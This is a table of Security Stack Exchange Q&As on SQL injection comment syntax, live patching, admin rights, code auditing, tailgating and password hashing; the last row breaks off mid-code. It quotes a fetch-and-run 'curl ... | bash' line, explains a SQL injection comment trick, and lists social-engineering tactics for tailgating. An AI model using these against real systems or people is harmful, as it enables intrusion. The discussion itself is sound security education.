source_id | question | response | metadata
---|---|---|---|
196,169 | I have encountered some websites where using -- to comment out the rest of the query didn't work, but --+ did. The official MySQL documentation has no such thing as --+ ; it only lists -- and two other comment styles. Why does this happen (in detail)? I want to know exactly why --+ sometimes works where -- doesn't, and why --+ is not listed as a comment style in the MySQL manual. | From the documentation: From a -- sequence to the end of the line. In MySQL, the -- (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on). This syntax differs slightly from standard SQL comment syntax, as discussed in Section 1.8.2.4, “'--' as the Start of a Comment”. (emphasis mine) Many URL decoders treat + as a space. | {
"source": [
"https://security.stackexchange.com/questions/196169",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/187893/"
]
} |
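A minimal sketch of the decoding step the answer above relies on (Python is used purely for illustration, and the injected parameter is a hypothetical example): many query-string decoders turn + into a space, so a payload ending in --+ reaches MySQL as -- followed by the whitespace its comment syntax requires.

```python
from urllib.parse import unquote_plus

# Hypothetical injected parameter as it appears in the URL of a vulnerable page.
payload = "1' OR '1'='1'--+"

# Many web stacks decode '+' as a space when parsing the query string, so the
# double dash reaches MySQL followed by the whitespace its comment syntax requires.
decoded = unquote_plus(payload)
print(repr(decoded))  # "1' OR '1'='1'-- "
```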
196,249 | How are critical security updates installed on systems that you cannot afford to reboot when the update requires a reboot? For example, services/businesses that are required to run 24x7 with zero downtime, e.g. Amazon.com or Google. | There are various utilities in different operating systems which allow hot-patching of running code. An example of this would be the kpatch and livepatch features of Linux, which allow patching the running kernel without interrupting its operation. Their capabilities are limited and can only make trivial changes to the kernel, but this is often sufficient for mitigating a number of critical security issues until time can be found to do a proper fix. This kind of technique in general is called dynamic software updating . I should point out, though, that the sites with virtually no downtime ( high-availability ) owe their reliability not to live-patching but to redundancy. Whenever one system goes down, there will be a number of backups in place that can immediately begin routing traffic or processing requests with no delay. There are a large number of different techniques to accomplish this. The level of redundancy determines the uptime, measured in nines . A three-nines uptime is 99.9%, a four-nines uptime is 99.99%, etc. The "holy grail" is five nines, or 99.999% uptime. Many of the services you listed have five-nines availability due to their redundant backup systems spread throughout the world. | {
"source": [
"https://security.stackexchange.com/questions/196249",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/189630/"
]
} |
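As a rough worked example of the "nines" mentioned above (assuming a 365-day year, which is an approximation), the downtime budget shrinks by a factor of ten with each extra nine:

```python
# Rough downtime budget per year for each level of "nines",
# assuming a 365-day year.
SECONDS_PER_YEAR = 365 * 24 * 60 * 60

for nines in range(3, 6):
    availability = 1 - 10 ** -nines            # 0.999, 0.9999, 0.99999
    downtime_minutes = SECONDS_PER_YEAR * (1 - availability) / 60
    print(f"{availability:.3%} uptime -> ~{downtime_minutes:.1f} minutes of downtime per year")
```

Three nines allow roughly 8.8 hours of downtime per year, while five nines allow only about 5 minutes, which is why redundancy rather than live-patching alone is what gets large sites there.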
196,265 | In a different Question , the first answer states that some metadata doesn't get encrypted: What you shouldn't forget about encrypted e-mail is that while the message body is properly encrypted, some metadata like the subject, sender or receiver isn't. Why doesn't Proton Mail encrypt some metadata? | Proton Mail uses an encryption format called OpenPGP . It is only designed to encrypt the message body. Unless the subject is put in the message and the subject field is left blank, the subject will be kept unencrypted. The e-mail sender and receiver fields, on the other hand, need to be unencrypted for proper routing to occur. This is all a limitation in the design of e-mail, a system that is unencrypted by default. | {
"source": [
"https://security.stackexchange.com/questions/196265",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/187394/"
]
} |
196,350 | Why do companies typically not give their employees root access to desktop machines that are only used by a single employee? If what I can do on my machine poses a threat to the rest of the network, isn't that a security flaw in itself? Why would the rights I have on my own machine affect what I can do to others on the network? Isn't the point of Unix user management to protect the files of user A on machine X from access by user B on machine X? If it's about protecting the user from himself (say, from installing something with root access that will wipe out the hard drive): since I am working without root access, all my files are owned by myself; hence, if I am fooled into running an evil script without root access and it wipes all the files owned by myself, it is just as bad as if I had given it root access and it had wiped the entire hard drive. | Security administrators are responsible for your machine and what happens on it. This responsibility breaks the basic security model of a single-user Unix machine, because the admin (an absent party) is root on your machine and you are not. Unix isn't really set up for this model. Admins need to be able to install security controls on your machine in order to protect the company, not just the data, the network, and the other nodes. If the local user had root access, then admins would no longer be in control of those controls. That's the basic premise. Yes, there are tons of bad things that require root, such as turning the machine into a malicious node, and all of those are good reasons not to provide root access. And yes, there are lots of ways around those limitations and lots of ways that the local user could do bad things. But ultimately, the local user and the Risk Owner cannot be competing for control of or responsibility for the machine. | {
"source": [
"https://security.stackexchange.com/questions/196350",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/186271/"
]
} |
196,455 | How to check whether the source code of an open-source project contains no malicious content? For example, in a set of source code files with altogether 30,000 lines, there might be 1-2 lines containing a malicious statement (e.g. calling curl http://... | bash ). Those projects are not well-known and it cannot be assumed that they are well-maintained. Therefore, the security of reusing their project source code cannot simply rely on blind trust (while it should be a reasonable assumption that it would be safe to download, verify, compile and run cmake directly, it doesn't sound good to blindly use an arbitrary library hosted on GitHub). Someone suggested that I filter the source code and remove all non-ASCII and invisible characters (except some trivial ones like line breaks), then open each file with a text editor and manually read every line. This is somewhat time-consuming, requires full attention when I read the code, and is actually quite error-prone. As such, I'm looking for general methods to handle such situations. For example, are there any standard tools available? Is there anything I have to pay attention to if I really have to read the code manually? | There are automated and manual approaches. For the automated route, you could start with lgtm - a free static code analyser for open source projects - and then move to more complex SAST solutions. For the manual route, you could build a threat model of your app and run it through the OWASP ASVS checklist, starting from its most critical parts. If there is file deletion in your threat model, just call something like this: grep -ir 'os.remove(' . Of course, it's better to combine both. | {
"source": [
"https://security.stackexchange.com/questions/196455",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/114489/"
]
} |
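Building on the grep idea in the answer above, here is a hedged sketch of an automated first pass: a small script that walks a source tree and flags lines matching a few illustrative patterns (piping a download into a shell, file deletion, dynamic code execution, non-ASCII bytes). The pattern list is an assumption chosen for demonstration and is nowhere near exhaustive; treat it as a triage aid, not a substitute for SAST tooling or manual review.

```python
import os
import re

# Illustrative patterns only -- far from exhaustive.
SUSPICIOUS = [
    re.compile(rb"curl\s+[^\n|]*\|\s*(ba)?sh"),      # piping a download into a shell
    re.compile(rb"os\.remove\(|shutil\.rmtree\("),   # file deletion
    re.compile(rb"\beval\(|\bexec\("),               # dynamic code execution
    re.compile(rb"[^\x00-\x7f]"),                    # non-ASCII bytes (possible homoglyph tricks)
]

def scan(root="."):
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as handle:
                    for lineno, line in enumerate(handle, start=1):
                        for pattern in SUSPICIOUS:
                            if pattern.search(line):
                                print(f"{path}:{lineno}: {line.strip()[:80]!r}")
                                break
            except OSError:
                pass  # unreadable file; skip it

if __name__ == "__main__":
    scan()
```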
196,591 | Can I send instructions embedded in an image to a target, if I know his CPU architecture? | CPU instructions are given in what are called opcodes , and you're right that those live in memory just like your image. They live in conceptually different "areas" of memory, though. For instance, you could imagine an opcode "read" (0x01) that reads a byte of input from stdin and puts it somewhere, and another opcode "add" (0x02) that adds two bytes. Some opcodes can take arguments, so we'll give our example opcodes some: the "read" opcode takes an operand for where to store the byte it reads, and the "add" one takes three operands: two for where to read its inputs, and one for where to write the result to. 0x01 a1 // read a byte to memory location 0xa1
0x01 a2 // read a byte to memory location 0xa2
0x02 a1 a2 a3 // read the bytes at locations 0xa1 and 0xa2, add them,
// and write the result to location 0xa3 This is typical of how a lot of instructions work: most of them just operate on data that's in memory, and some of them put new data into memory from the outside world (from reading stdin, in this example, or from reading a file or network interface). While it's true that the instructions and the data they operate on are both in memory, the program will only run the instructions. It's the job of the CPU, the OS, and the program to all make sure that happens. When they fail, you can in fact load data into the execution space, and it's a serious security bug. Buffer overflows are probably the most famous example of such a bug. But other than those kinds of bugs, you can essentially think of the data space and the execution space as being separate chunks of memory. In a toy computer, using the example above, the memory might look something like: (loc) | Initial | After op 1 | After op 2 | After op 3 |
0x00 | *01 a1 | 01 a1 | 01 a1 | 01 a1 |
0x02 | 01 a2 | *01 a2 | 01 a2 | 01 a2 |
0x04 | 02 a1 a2 a3 | 02 a1 a2 a3 | *02 a1 a2 a3 | 02 a1 a2 a3 |
0x08 | 99 | 99 | 99 | *99 |
...
0xa1 | 00 | 03 | 03 | 03 |
0xa2 | 00 | 00 | 04 | 04 |
0xa3 | 00 | 00 | 00 | 07 | In that example, the asterisk ( * ) points to the next opcode that will be executed. The leftmost column specifies the starting memory location for that line. So for instance, the second line shows us two bytes of memory (with values 01 and a2 ) at locations 0x02 (explicitly in the left-hand column) and 0x03. (Please understand that this is all a big simplification. For instance, in a real computer the memory can be interleaved -- you won't just have one chunk of instructions and one chunk of everything else. The above should be good enough for this answer, though. ) Note that as we run the program, the memory in areas 0xa1 - 0xa3 changes, but the memory in 0x00 - 0x08 does not. The data in 0x00 - 0x08 is our program's executable, while the memory in areas 0xa1 - 0xa3 is memory the program uses to do the number crunching. So to get back to your example: the data in your jpeg will get loaded into the memory by opcodes, and will be manipulated by opcodes, but will not be loaded into their same area in memory. In the example above, the two values 0x03 and 0x04 were never in opcode area, which is what the CPU executes; they were only in the area that the opcodes read and write from. Unless you found a bug (like a buffer overflow) which let you write data into that opcode space, your instructions won't be executed; they'll just be the data that gets manipulated by the program's execution. | {
"source": [
"https://security.stackexchange.com/questions/196591",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/190028/"
]
} |
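To make the separation described above concrete, here is a toy interpreter for the made-up opcodes in that answer (the opcode values and memory layout are the answer's invented examples, not a real instruction set). The fetch/execute loop only ever decodes bytes from the program region; the input bytes, which stand in for image data, land in the data region and are never executed.

```python
# Toy interpreter for the made-up opcodes above: 0x01 = "read a byte into a
# memory location", 0x02 = "add two locations into a third", 0x99 = halt.
memory = bytearray(256)
program = bytes([0x01, 0xA1,              # read -> 0xa1
                 0x01, 0xA2,              # read -> 0xa2
                 0x02, 0xA1, 0xA2, 0xA3,  # mem[0xa3] = mem[0xa1] + mem[0xa2]
                 0x99])                   # halt
memory[:len(program)] = program

def run(inputs):
    stream = iter(inputs)
    pc = 0                        # program counter: only ever walks the program region
    while True:
        op = memory[pc]
        if op == 0x01:            # input bytes go into the data region, never the program
            memory[memory[pc + 1]] = next(stream)
            pc += 2
        elif op == 0x02:
            a, b, dest = memory[pc + 1], memory[pc + 2], memory[pc + 3]
            memory[dest] = (memory[a] + memory[b]) % 256
            pc += 4
        elif op == 0x99:          # halt
            return

run([3, 4])
print(memory[0xA3])   # 7 -- the input was only ever data, never code
```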
196,664 | long story short if you can execute code on a box it is usually straightforward to get root ( quote source ) The immediate implication of this quote (if it's accurate) is that if you're running a multi-user system and don't try your darndest to prevent all users from creating files with x permission set, the system is as good as compromised. The corollary is that operating a multi-user system, such as ones typically found in universities, that by design allow all students to do exercises in C, C++, assembly etc, is pointless, since any student can straightforwardly root this system. Since running computer systems intended to be used by more people than their owners is not considered pointless, and privilege limiting facilities (users' rights management, sandboxing, etc etc) are not considered useless, I somehow doubt these kinds of comments. But what do I know? Is it true that most Linux systems are straightforwardly rootable by anyone who can execute code on them? | No, this is not correct. While one may argue about the relative difficulty of finding and exploiting 0day vulnerabilities on Linux when you have local access, the security architecture itself of a modern Linux system (with an MMU ) is designed to isolate different users and prevent privilege escalation. A non-root user cannot gain root without proper authorization without exploiting an extant vulnerability, and such privilege escalation vulnerabilities are very quickly patched as soon as they are discovered. * It is possible, however, to abuse the human factor and gain root by exploiting misconceptions ubiquitous in the sysadmin profession. This of course relies on the sysadmin misunderstanding the security architecture of the system they maintain. A non-exhaustive list of examples: Elevating privileges with sudo or su from an unprivileged but untrusted user. 1 Tricking a sysadmin into running ldd on a malicious static executable as root. 2 Abusing an insecurely installed binary. 3 Dropping down to a lesser user from root, allowing a TTY pushback attack. 4 5 * While this is ostensibly true, many deployments do not update themselves frequently enough, leading to live production systems being vulnerable to known bugs. An update being available does not guarantee an update being installed. | {
"source": [
"https://security.stackexchange.com/questions/196664",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108649/"
]
} |
197,004 | Right now I'm generating a 25 character string stored in the database that can only have a 1 time use and expires 30 minutes after user registration. http://example.com/security/activate/ZheGgUNUFAbui4QJ48Ubs9Epd I do a quick database lookup and the logic is as follows: If the account is not activated AND if the email was not verified AND the validation code is still valid, activate the account, mark the email address as verified and mark the validation code as used. Every 72 hours for example it would flush expired and used validation codes.
This is in order to tell the user that the activation link clicked has expired, for example if he looks at his email the day after and tries the link. Should I include the user UUID in the URL? Do I need to include something else? I thought about making sure the IP address on the registration form matches the IP address of the request when the activation link is pressed, but I mainly read my emails on my cellphone for this kind of stuff, so it would be a pain for UX. | How are you generating the 25 character string which you include in the URL? Is it completely random, or is it based off the current time or the user's email? It should be random and not guessable. You should also make sure the verification page actually renders (not just that a GET request occurred). Browsers such as Chrome (and antivirus programs) often load URLs without the user explicitly clicking them, either as a pre-fetch or to scan for security reasons. That could result in a scenario where a malicious actor (Eve) wants to make an account using someone else's email (Alice).
Eve signs up, and Alice receives an email. Alice opens the email because she is curious about an account she didn't request. Her browser (or antivirus) requests the URL in the background, inadvertently activating the account. I would use JavaScript on the page to verify the page actually rendered, and also include a link in the email where users can report that they did NOT create this account. | {
"source": [
"https://security.stackexchange.com/questions/197004",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/190501/"
]
} |
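For the "how are you generating the string" point above, a minimal sketch of an unguessable, time-limited activation token using a CSPRNG (the function name and 30-minute lifetime are illustrative assumptions; the URL shape mirrors the one in the question):

```python
import secrets
from datetime import datetime, timedelta

def new_activation_token(lifetime_minutes=30):
    """Return an unguessable, single-use activation token and its expiry time."""
    token = secrets.token_urlsafe(24)              # ~32 URL-safe characters from a CSPRNG
    expires_at = datetime.utcnow() + timedelta(minutes=lifetime_minutes)
    return token, expires_at

token, expires_at = new_activation_token()
print(f"http://example.com/security/activate/{token} (valid until {expires_at:%Y-%m-%d %H:%M} UTC)")
```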
197,038 | My site has been getting probed by a bunch of IPs from Morocco (trying to submit forms, trying out potential URLs, trying to execute scripts, etc.). I have a strong suspicion it's the same person after observing the pattern of how they behave. Looking at the logs, they don't seem to have found any vulnerabilities. I'm not sure what I should do about this other than keep observing. Blocking the IP doesn't seem useful since it seems to change. Is there anything I can do about it at this point? | Welcome to the internet! This is the normal situation, business as usual. You don't have to do anything but harden your website. Probes like that occur all the time, on every site, day and night. Some people call that "voluntary pen testing." Depending on your site, there are some tools that you can use to help you keep those kinds of probes out. WordPress sites have a couple of plugins (you can search for security plugins in the plugins directory), and I believe the other popular platforms out there have equivalent plugins. Another tool I usually employ is fail2ban. It can parse your webserver log files and react accordingly. | {
"source": [
"https://security.stackexchange.com/questions/197038",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/129001/"
]
} |
197,054 | I'm using the "keytool.exe" JDK utility to try to create a CSR (Certificate Signing Request) with the "-certreq" arg. Was wondering why this requires an alias (i.e. of another cert in the keystore) when I haven't even gotten the cert back yet from the CA (to whom I'd send the CSR). I understand that it could be used to marry the signed cert w/ an existing key pair/self-signed cert, but what I want to do is (to create a new cert): Generate a CSR to send to CA ("-certreq" arg). Upon receipt of signed cert, gen a new key pair ("-genkeypair arg)" w/ new alias . Import my new cert against that alias from #2. My contention is that I shouldn't need an existing keystore entry/alias for step# 1. Do I really need some dummy self-signed cert in the keystore 1st? Thx! | | {
"source": [
"https://security.stackexchange.com/questions/197054",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/188339/"
]
} |
197,070 | I'm working on a cryptosystem that uses colour pictures as keys for encryption. I'm trying to guess what is the key size of my cryptosystem in order to find the feasibility of a brute force attack. My cryptosystem uses RGB pictures of any size M x N. The picture is also generated by a chaotic attractor which is sensitive to initial values, so each picture generated is different. These pictures are an example: I haven't found a paper that tries to do the same calculation yet. Any idea on what the key size is? | Your most recent edit indicates that your pictures are procedurally-generated, so your key size will therefore be bounded by the amount of state required to generate an image. Yours seem to be parameterized by four floats for the initial conditions (and fixed output image size, camera location, point light location, convergence conditions, etc). Those 128-bits of state will then be transformed into an image by an algorithm that depends solely on your provided state, so your image "key" cannot contain more than 128 bits of information. In fact, I think that entire classes of initial values produce identical outputs (e.g. when all four floats are extremely small), so your image "key" size will be strictly less than 128-bits. There's really no benefit to touching the 128 bits of state by turning it into an image (and then somehow back) if you only reduce the size of the key by doing so. | {
"source": [
"https://security.stackexchange.com/questions/197070",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/190594/"
]
} |
197,169 | In a seminar, one of the authors of Beehive: Large-Scale Log Analysis for Detecting Suspicious Activity in Enterprise Networks said that this system can prevent actions like the ones Snowden took. From the article's conclusions: Beehive improves on signature-based approaches to detecting security incidents. Instead, it flags suspected security incidents in hosts based on behavioral analysis. In our evaluation, Beehive detected malware infections and policy violations that went otherwise unnoticed by existing, state-of-the-art security tools and personnel. Can Beehive or a similar system prevent Snowden-type actions? | A backup operator will have the permissions and behavioral markers of someone who moves lots of data around, like any sysadmin where there's no dedicated backup operator in place. Snowden was a sysadmin. He knew all the protection protocols in place. He could just impersonate anyone, from any area, download things, impersonate the next one, and keep doing that. If it's common knowledge that there's no bulletproof protection against a dedicated attacker, imagine a trusted internal dedicated attacker with sysadmin privileges. | {
"source": [
"https://security.stackexchange.com/questions/197169",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/86735/"
]
} |
197,236 | Let's say I have a database with a bunch of users in it. This user database would typically have a hashed password per user. Would it be bad practice to prefix this hash with the hashing algorithm used? For instance, instead of the hash aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d , I store sha1_aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d , since the method for making the hash is SHA1. I noticed Argon2 does this, and I actually think it is quite convenient, because it makes it easier to partially migrate to newer hashing algorithms for newer users over time. I don't use SHA1 in my production code for passwords. SHA1 was chosen randomly. This question is not about the use of the hashing method. | Many different password hashing systems do this. The type of hashing mechanism used should not be (and should not need to be) a secret. Kerckhoffs's principle says: A cryptosystem should be secure even if everything about the system,
except the key, is public knowledge. So, if your system is properly secure, it should not matter if the hash mechanism is exposed. | {
"source": [
"https://security.stackexchange.com/questions/197236",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/177287/"
]
} |
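A small sketch of why the prefix is convenient for migration, as the question suggests: verification dispatches on the prefix, and entries made with an older algorithm can be transparently re-hashed on the next successful login. As in the question, SHA-1/SHA-256 appear only to keep the example short; fast unsalted hashes are not suitable for real password storage.

```python
import hashlib
import hmac

# Purely illustrative: fast unsalted hashes like these are NOT suitable for real
# password storage -- the point is only how a prefix enables gradual migration.
HASHERS = {
    "sha1":   lambda pw: hashlib.sha1(pw).hexdigest(),
    "sha256": lambda pw: hashlib.sha256(pw).hexdigest(),
}
CURRENT = "sha256"

def hash_password(password: str) -> str:
    return f"{CURRENT}_{HASHERS[CURRENT](password.encode())}"

def verify_and_upgrade(password: str, stored: str):
    algo, _, digest = stored.partition("_")
    ok = hmac.compare_digest(HASHERS[algo](password.encode()), digest)
    if ok and algo != CURRENT:
        stored = hash_password(password)   # re-hash old entries on successful login
    return ok, stored

ok, stored = verify_and_upgrade("hello", "sha1_" + hashlib.sha1(b"hello").hexdigest())
print(ok, stored.split("_", 1)[0])   # True sha256
```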
197,250 | I live in a city where CCTV camera coverage is comprehensive and increasing. Cameras are getting cheaper and higher resolution. Everyone has a video camera in their pocket already, and we are starting to see trends which indicate always-on cameras may become commonplace in other devices like glasses. It has occurred to me, when out in public and entering my username/password into apps on my phone and laptop, that if a camera could capture both my screen and my keyboard, it could be fairly straightforward for a viewer to grab or guess my credentials from the footage assuming a high enough resolution image and the view not being (too) obscured. Without going too much into the details of how it would be implemented, the accuracy and cost etc, I have a background in image processing and so am also aware that this would likely be automatable to at least some degree. So I thought I would ask the community here if this is actually a viable risk? Have there been any known instances of it happening already? Are people thinking about this with respect to the viability of plaintext credential entry into apps in the long run? | Lots of examples. A high-profile and recent example is when Kanye was caught on camera entering his "00000" password to unlock his device. Shoulder-surfing is one reason why applications do not display the password text on the screen, but show ****** instead. And this is one reason why multi-factor authentication is so important; even if you know the password, you cannot use it without another factor. I have even seen viable research into capturing the sound of the keyboard when a user types the password, even over the computer's microphone . So, yes, you describe a viable risk that the industry has been addressing for a long time. The specifics of high-res cameras is just not a significant enough of a new factor to consider. Shoulder-surfing and keyloggers are a current risk. The industry knows that it needs to develop something better than passwords, and there are many active attempts to do so, but nothing is mature or stable enough yet. | {
"source": [
"https://security.stackexchange.com/questions/197250",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55705/"
]
} |
197,330 | Say my password is abc . I want to send it to the server over HTTP. I could send it in plaintext and let the server hash it and compare it to the entries in its database, but then anyone that can see traffic over that connection would see the password in plain text. So then I could hash it client-side and let the server just compare it without hashing since it's already hashed (or the server could even double hash, but no difference in this situation). But then again anyone that can see the traffic would see the password hashed, and then send the hashed password to the server and the server would accept it. How do I send passwords over HTTP? Do I need to implement some encryption algorithm like RSA public key encryption? Or is this impossible? The method should be usable in any browser. | You can't. To securely send information over an unsecure channel, you need encryption. Symmetric encryption is out, because you would first need to transport the key, which you can't do securely over an unsecure channel[*]. That leaves you with public key cryptography. You could of course roll your own , but you don't want to be a Dave , so that's out, which leaves you with HTTPS. [*] You can of course try to use a secure channel to exchange the key, for example physical exchange of a key. Then you can use secret key crypto, like Kerberos. | {
"source": [
"https://security.stackexchange.com/questions/197330",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/190914/"
]
} |
197,588 | I was just surprised to see this suspicious promoted tweet, asking me to send Bitcoins I added the hand-drawn red lines so I am not responsible for propagating the apparent scam. Clicking on the user name seems to take me to the genuine Target page with the verified checkmark. Clicking on the link to the tweet (i.e. "40m") gives me an error that the tweet no longer exists. Clicking on the URL goes to a page that looks like the screenshot, and a list of transactions. Is it fair for me to conclude: Target lost control of their Twitter account to an (internal or external) scammer, who is ripping off people who think they are having a give-away? Is there another way their username could appear advertising a scam without access to their Twitter account credentials? | Yes, Target did have their account hacked. In fact, quite a lot of verified account holders have been hacked to further this scam. The scammers do this to impersonate other accounts, including Elon Musk's, by changing their name while retaining their verified status. In this case, it just looks like the scammer is using Target's account directly. This scam has made the hackers over $150,000. The Elon Musk scam is the most well-known now, but it appears Target was caught as well . | {
"source": [
"https://security.stackexchange.com/questions/197588",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40146/"
]
} |
197,720 | At my job, to be able to view my paychecks, vacation hours and HR data on myself I need to log into a 3rd party website. I'm by no means a security expert or expert programmer but I could tell (simply by trying) that I could continue to try incorrect passwords without being locked out. (brute force: viable) After logging in I was forced to select 3 pre-determined security questions in the case of a password reset (out of a total of 8!) such as my first car's licence plate (never owned a car 3/7), my spouse's 2nd name (don't have a spouse 3/6), 2nd name of my first kid (don't have kids 3/5), birthdate, name of my highschool, favorite pet, favorite film or favorite piece of music. Most these things you can simply get from my facebook, (which, I should note, has not been updated for years!) again showing a distinct lack of understanding in basic security practices. I also get the feeling, from looking at the site through the developer tools they use incredibly outdated software A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 2.1 Copyright (C) Paul Johnston 1999 - 2002. I reported this through my company but my superiors don't appear all that interested. How would I go about: A. Finding out if this site is really as insecure as I think it is? B. if true: communicating this in an appropriate manner to the company itself
(preferably in an anonymous fashion) | To start with the easy bit: you do not have to put real information as the answers to the questions. Random strings work best if you are really paranoid and store them in a password manager just like a password. The rest (no brute force protection, potentially outdated software) is a shame, but there is nothing that you can do, from a security perspective. I would raise the issue with HR/Payroll and ask them to investigate. If you are in Europe, then you can also talk to your DPO to suggest that their "Data Processor" has troubling account security practices that need to be investigated. Otherwise, this is more of an internal office politics issue. | {
"source": [
"https://security.stackexchange.com/questions/197720",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191356/"
]
} |
197,732 | Following people into a large RFID-protected residential building is ridiculously easy, as not everyone knows everyone else. Just the other day I was let in with a rifle (an airgun, but how could they have known). But standing helplessly in front of the door, looking in sorrow at the lock, is not the best role to play, as it attracts questions like "who are you" or "who are you visiting". What is a more appropriate behavior when waiting around for someone to enter? | There are some basic social engineering approaches that work in most situations, not just tailgating: urgency authority curiosity pretexting Urgency Be someone with a specific task to perform that needs to be done right now. The classics are a delivery person with full arms and someone looking to pick someone else up. A family member needing to check on an elderly resident. People want to be helpful, and they don't think that you will be around long enough to be a threat. Authority Be someone who the gatekeeper has no right or reason to refuse. Fire marshal, utilities inspector, law enforcement, building security, process server. There are lots of studies of people being let in with just a clipboard and a high-visibility vest. Curiosity To get close to someone, be very interesting in such a way that they want to know more. Dress up as a clown to deliver a telegram. Pretexting Establish a shallow relationship that appears to be deeper. Smoking with people outside on their break is classic. The smokers will assume you are also an employee (why else would you be there?) Combinations But these work even better in combination. A fire marshal in an awful rush. A clown who claims he was at the last company party (and knows a few important names). The more techniques you can combine, the more effective the process is: an authority figure, in a rush, to do something interesting, who claims to have a preexisting relationship. If you go over the top or try too hard, it will backfire, though. | {
"source": [
"https://security.stackexchange.com/questions/197732",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10990/"
]
} |
197,786 | I have a REST API for running some calculations and returning the result, with a very simple token system where only authorized users can use the API. The user adds their token to the query like this: {
authorization: 'my token',
moreData: 51351,
etc: 'etc'
} Because the users of this API are usually not programmers, I have made a very simple web page demonstrating the API, with a live demo that can be run directly from the web page, demonstrating how it works and what is returned. This demonstration has a fake authorization token, which is displayed in the example query. I have made a simple, hidden and partially obfuscated JavaScript function that intercepts this fake token and replaces it with an actual token before sending the request, which will probably trick most users. But a user that actually watches the request from the debug tool in the browser will easily see the actual token that is sent, and can use this token to send their own request. Of course, I could rate limit the demo token, but then that would mean that users who are experimenting with the live demo could experience temporary lock-outs, which I would like to avoid. Is there any way of protecting the demo authorization token from an API that needs to be easy to use, and needs a live demo? | As Steffen has said you cannot protect the token from users. I'd just like to add a suggestion for a more general scenario of having a "demo" Api. It sounds like your API doesn't have any stored data and just does calculations on input so this may not be a concern for you, but rather than having the demo token point to your real api, you could point it to a demo / sandbox version with meaningful, but not real data that could: only have the demo token in it - no other users be reset automatically on a daily basis have a small amount of data in it rather than your full set (if you have data) potentially not return valid results for all calculations as a way of requiring people get a real account from you rather than just using the demo token This would feel safer to me as your live system would never be touched by anybody with the demo token, and in scenarios where you may have functionality you are selling etc, it allows developers to integrate and confirm they have integrated correctly, but doesn't give away the full set of functionality/data to the demo token. | {
"source": [
"https://security.stackexchange.com/questions/197786",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69663/"
]
} |
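A hedged sketch of the sandbox routing suggested above (the token values, result data, and function names are hypothetical stand-ins): the published demo token is short-circuited to canned sample data and never reaches the live calculation or real credentials.

```python
# All names and values here are hypothetical stand-ins.
DEMO_TOKEN = "demo-token-shown-in-the-docs"
VALID_TOKENS = {"real-token-issued-to-a-customer"}      # stand-in for a real token store

SANDBOX_RESULT = {"result": 42, "note": "sample data - request a real token for live access"}

def run_real_calculation(payload: dict) -> dict:
    # Placeholder for the real calculation the API performs.
    return {"result": payload.get("moreData", 0) * 2}

def handle_request(payload: dict) -> dict:
    token = payload.get("authorization")
    if token == DEMO_TOKEN:
        # The published token is short-circuited: it never reaches live logic or data.
        return SANDBOX_RESULT
    if token not in VALID_TOKENS:
        raise PermissionError("unknown token")
    return run_real_calculation(payload)

print(handle_request({"authorization": DEMO_TOKEN, "moreData": 51351}))
```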
197,817 | This is a follow-up question to this one: Roles to play when tailgating into a residential building . How do you protect yourself or your company against tailgaters? What is the best answer when you are asked by, let's say, the delivery guy to let him in? | This is not a problem that has a social solution. No amount of corporate policy will save you. Humans are social animals. In the end, if people can let other people in, they will. Even if you are very security aware and never let anyone in, 95% of your colleagues will act differently. You have to work with human nature, not against it. So if you want to stop tailgating, you'll need a physical barrier such as a security turnstile or mantrap, preferably placed at a reception with human supervision. | {
"source": [
"https://security.stackexchange.com/questions/197817",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/191453/"
]
} |
197,994 | I have to store passwords on a system which doesn't offer any of the algorithms recommended for hashing passwords (e.g. bcrypt, scrypt or PBKDF2). Would it be better to use an unsuitable algorithm (e.g. the SHA-1 or SHA-2 family) than to use none at all? Additional Information : I will be the only one storing passwords on that system, so I can 1) guarantee that none of the passwords will be used twice and 2) ensure that the passwords will have a very high entropy. | The real answer to your question is simply: do not store the passwords there if you cannot properly protect them. "The system does not support proper password hashing algorithms" is not a valid excuse to compromise the security of your users. Either find a way to properly hash passwords using a strong and properly configured algorithm, or do not store them. But to provide a direct answer to your question: yes, something is better than nothing. SHA-1 or SHA-2 is definitely an improvement over plaintext. To answer the "then where should the passwords go?" question - based on the phrasing, I am assuming there is a new feature/request for the software that requires the system to store passwords. If the system cannot properly and securely store passwords (by modern security standards), then I (personally) would reject the request. Intentionally practicing poor security because of legacy system constraints or to appease a business use case is bad security practice. I would inform whoever made the request that there are two viable options: either we completely overhaul the system to one that supports modern security practices (such as proper cryptographic password hashing), or I simply cannot add the new feature/request to the existing system, for it would compromise security. | {
"source": [
"https://security.stackexchange.com/questions/197994",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/76285/"
]
} |
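One hedged illustration of the "something is better than nothing" point: if the platform exposes the SHA-2 family, it can often also drive PBKDF2, which is just iterated HMAC-SHA under the hood. The sketch below assumes a Python-like environment purely for demonstration; the iteration count and storage format are illustrative choices, and a vetted password-hashing library is still preferable wherever one can be installed.

```python
import hashlib
import hmac
import os

def hash_password(password: str, iterations: int = 600_000) -> str:
    salt = os.urandom(16)                                   # per-password random salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
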